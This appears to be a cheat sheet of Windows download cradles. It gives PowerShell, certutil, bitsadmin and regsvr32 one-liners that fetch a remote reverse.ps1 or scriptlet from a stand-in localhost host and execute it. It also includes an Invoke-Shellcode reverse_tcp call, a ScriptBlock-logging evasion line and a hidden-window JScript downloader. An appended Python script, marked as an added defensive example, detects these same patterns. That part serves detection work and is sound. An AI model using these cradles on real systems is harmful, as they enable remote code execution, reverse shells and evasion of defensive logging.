Cradles for Windows

Cradles are techniques for downloading and executing external resources, whether to deploy tooling or to run remote code. Payloads are the content delivered this way; what they do depends on the objective or purpose.

Normal Download

IEX (New-Object Net.Webclient).downloadstring("http://localhost:8080/reverse.ps1")

Invoke-WebRequest Cradle

IEX (iwr 'http://localhost:8080/reverse.ps1')

Msxml2.XMLHTTP COM Object

$req = New-Object -ComObject Msxml2.XMLHTTP;$req.open('GET', 'http://localhost:8080/reverse.ps1', $false);$req.send();iex $req.responseText

WinHttp COM Object

$req = New-Object -ComObject WinHttp.WinHttpRequest.5.1;$req.open('GET', 'http://localhost:8080/reverse.ps1', $false);$req.send();iex $req.responseText

BitsTransfer Cradle

ipmo BitsTransfer;Start-BitsTransfer 'http://localhost:8080/reverse.ps1' $env:temp\rev.ps1;$r = gc $env:temp\rev.ps1;rm $env:temp\rev.ps1;iex $r

Remote XML Execution Cradle

<?xml version="1.0"?>
<command>
   <a>
      <execute>Write-Output "This is a malicious payload"</execute>
   </a>
</command>
$doc = New-Object System.Xml.XmlDocument;$doc.Load("http://localhost:8080/reverse.xml");$doc.command.a.execute | iex

CertUtil Cradle

certutil.exe -urlcache -split -f "http://localhost:8080/reverse.ps1" reverse.ps1; IEX (Get-Content reverse.ps1)

PowerShell Download Encoded Command

$payload = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX (iwr 'http://localhost:8080/reverse.ps1')"))
powershell.exe -EncodedCommand $payload

BitsAdmin Cradle

bitsadmin /transfer "payload" "http://localhost:8080/reverse.ps1" "$env:TEMP\reverse.ps1"; if (Test-Path "$env:TEMP\reverse.ps1") {powershell -ExecutionPolicy Bypass -File "$env:TEMP\reverse.ps1"}

Invoke-Shellcode Cradle

IEX (New-Object Net.Webclient).downloadstring("http://localhost:8080/invoke-shellcode.ps1")
Invoke-Shellcode -Payload "reverse_tcp" -Lhost "127.0.0.1" -Lport 4444

PowerShell ScriptBlock Logging Evasion

$sb = [scriptblock]::Create('IEX (New-Object Net.Webclient).downloadstring("http://localhost:8080/reverse.ps1")'); & $sb

.NET WebClient Gz Cradle

$wc = New-Object System.Net.WebClient
$compressedData = $wc.DownloadData("http://localhost:8080/reverse.ps1.gz")
$memoryStream = New-Object System.IO.MemoryStream(, $compressedData)
$gzStream = New-Object System.IO.Compression.GzipStream($memoryStream, [System.IO.Compression.CompressionMode]::Decompress)
$streamReader = New-Object System.IO.StreamReader($gzStream)
$decompressedScript = $streamReader.ReadToEnd()
Invoke-Expression $decompressedScript

regsvr32 Cradle

<?XML version="1.0"?>
  <scriptlet>
    <registration
      progid="SCT Payload"
      classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
      <script language="JScript">
        <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c $u=new-object net.webclient;$u.proxy=[Net.WebRequest]::GetSystemWebProxy();$u.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $u.downloadstring('http://localhost:8080/reverse.ps1');"); ]]>
     </script>
   </registration>
  </scriptlet>
regsvr32 /s /n /u /i:http://localhost:8080/reverse.sct scrobj.dll
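As an added defensive example (not part of this page), the following Python script recognises the cradle patterns listed above in process command lines or ScriptBlock text, decoding -EncodedCommand before matching so the Base64 variant is classified the same as its plain form. The regex names and the sample command lines are constructed for this example.

```python
import base64
import re

# Indicators drawn from the cradles listed on this page, matched case-insensitively against a command line or ScriptBlock text.
CRADLE_PATTERNS = {
    "webclient_download_iex": r"net\.webclient.*download(?:string|data|file)",
    "iwr_to_iex": r"\biex\b\s*\(\s*iwr\b",
    "msxml2_xmlhttp": r"msxml2\.xmlhttp",
    "winhttprequest": r"winhttp\.winhttprequest",
    "bits_transfer": r"start-bitstransfer|bitsadmin\s+/transfer",
    "certutil_urlcache": r"certutil(?:\.exe)?\s+-urlcache",
    "xmldocument_load_url": r"xmldocument.*\.load\(\s*['\"]https?://",
    "gzip_decompress": r"gzipstream.*decompress",
    "regsvr32_scrobj": r"regsvr32.*/i:https?://.*scrobj\.dll",
}
# -EncodedCommand and its short forms, followed by a Base64 blob.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(cmdline):
    """Return the sorted cradle labels that match, after expanding any encoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = {n for n, p in CRADLE_PATTERNS.items() if re.search(p, text, re.I | re.S)}
    if decoded is not None:
        hits.add("encoded_command")
    return sorted(hits)

# Constructed sample command lines (not real telemetry) mirroring the page's cradles.
SAMPLE_EVENTS = [
    'powershell.exe IEX (New-Object Net.WebClient).downloadstring("http://localhost:8080/reverse.ps1")',
    "certutil.exe -urlcache -split -f http://localhost:8080/reverse.ps1 reverse.ps1",
    "regsvr32 /s /n /u /i:http://localhost:8080/reverse.sct scrobj.dll",
    "powershell.exe -EncodedCommand "
    + base64.b64encode("IEX (iwr 'http://localhost:8080/reverse.ps1')".encode("utf-16-le")).decode(),
    "powershell.exe Get-ChildItem C:\\Windows\\Temp",  # benign control line
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(classify(e) or ["clean"], "<-", e[:70])
```

The labels map one-to-one onto the cradle headings above, so a hit tells the analyst which variant was used; the benign control line produces no label.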